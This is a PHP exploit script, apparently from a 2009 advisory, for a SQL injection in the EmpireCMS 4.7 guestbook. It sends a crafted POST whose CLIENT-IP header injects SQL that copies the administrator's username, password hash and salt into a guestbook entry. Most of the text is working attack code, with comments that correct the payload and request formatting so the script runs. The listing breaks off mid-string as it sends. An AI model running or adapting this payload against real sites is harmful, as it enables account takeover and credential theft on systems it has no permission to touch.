# Title : Empire CMS 47 SQL Injection
# Published : 2009-10-05
# Author : Securitylab Security Research
<?php
// EmpireCMS47 guestbook SQL injection PoC (Securitylab.ir, published 2009-10-05).
// Usage: php <this file> <host> <path>. The script opens a plain-HTTP connection
// to port 80 and sends one POST to <path>/e/enews/index.php whose CLIENT-IP
// request header carries the injected SQL (see $cmd). The archived listing is
// cut off right after the connect step, so response handling is not shown here.
//
// Banner, printed before any argument checking.
echo <<<BANNER

+------------------------------------------------------------------+
Application Info:
Name: EmpireCMS47
--------------------------------------------
Discoverd By: Securitylab.ir
Contacts: info@securitylab[dot]ir
Note: just work as php>=5&mysql>=4.1
--------------------------------------------
Vulnerability Info:
Sql Injection
Medium Risk
+------------------------------------------------------------------+

BANNER;
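// Command-line handling: exactly two positional arguments (host, path) are
// required. A usage error now exits non-zero so shell callers can detect it
// (the original `die;` exited with status 0).
// NOTE(review): the archived copy lost the backslashes of its escape sequences
// ("n", "rn" and the non-existent variable "$hostrn" further down); they are
// restored here as real "\n" / "\r\n".
if ($argc < 3) {
    echo "Usage: php " . $argv[0] . " host path\n";
    echo "host: target server \n";
    echo "path: path to EmpireCMS47\n";
    echo "Example:\r\n";
    echo "php " . $argv[0] . " localhost /\n";
    exit(1);
}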
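// Target coordinates from the command line. The trailing slash is trimmed so
// that "$path/e/..." does not become "//e/..." when the path given is "/"
// (the usage example), and so the Referer URL below is well-formed.
$host = $argv[1];
$path = rtrim($argv[2], '/');

// POST body for the guestbook "AddGbook" action (the enews field looks like the
// action dispatcher; the remaining fields are filler values).
$data = "name=11ttt&email=111&call=&lytext=1111&enews=AddGbook";

// Injected SQL, delivered through the CLIENT-IP request header below. The
// application evidently interpolates that header unescaped into its guestbook
// INSERT: the fragment closes the quoted value, completes the current VALUES
// tuple, appends a second tuple whose text column is
// username_password_rnd (0x5f = "_") of userid=1 from phome_enewsuser, and
// comments out the rest of the statement with "/*".
// The value must stay on ONE line: a bare LF inside a header value terminates
// the header early and breaks the request (the archived listing wrapped it).
// The SQL tokens are unchanged; the line break became the space after "where".
$cmd = "aaaaaaaa',0,1,''),('t00lsxxxx','t00lsxxxxx','','2008-05-28 15:44:17',"
     . "(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where "
     . "userid=1),'',1,'1111',0,0,'')/*";

// Raw HTTP/1.1 request. Every header line is CRLF-terminated, a blank line
// separates headers from the body, and Content-Length is the byte length of
// $data. This is plain HTTP only; the socket below is a raw TCP connection.
$message  = "POST " . $path . "/e/enews/index.php HTTP/1.1\r\n";
$message .= "Host: $host\r\n";
$message .= "Referer: http://" . $host . $path . "/e/tool/gbook/?bid=1\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$message .= "CLIENT-IP: $cmd\r\n";
$message .= "Content-Length: " . strlen($data) . "\r\n";
$message .= "Cookie: ecmsgbookbid=1;\r\n";
$message .= "Connection: Close\r\n";
$message .= "\r\n";
$message .= $data;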
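// Open a plain TCP connection to port 80 with a 10 s connect timeout (the
// original had none and could hang indefinitely). The socket error text is
// reported instead of a bare "No response" so DNS and connect failures are
// distinguishable, and the exit status is non-zero on failure.
// A TLS-only target would need the "ssl://" stream wrapper and port 443.
$errno  = 0;
$errstr = '';
$ock = fsockopen($host, 80, $errno, $errstr, 10);
if ($ock === false) {
    echo 'No response from ' . $host . ": $errstr ($errno)\n";
    exit(1);
}
echo "[+]connected to the site!\r\n";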
echo "[+]sending data nowa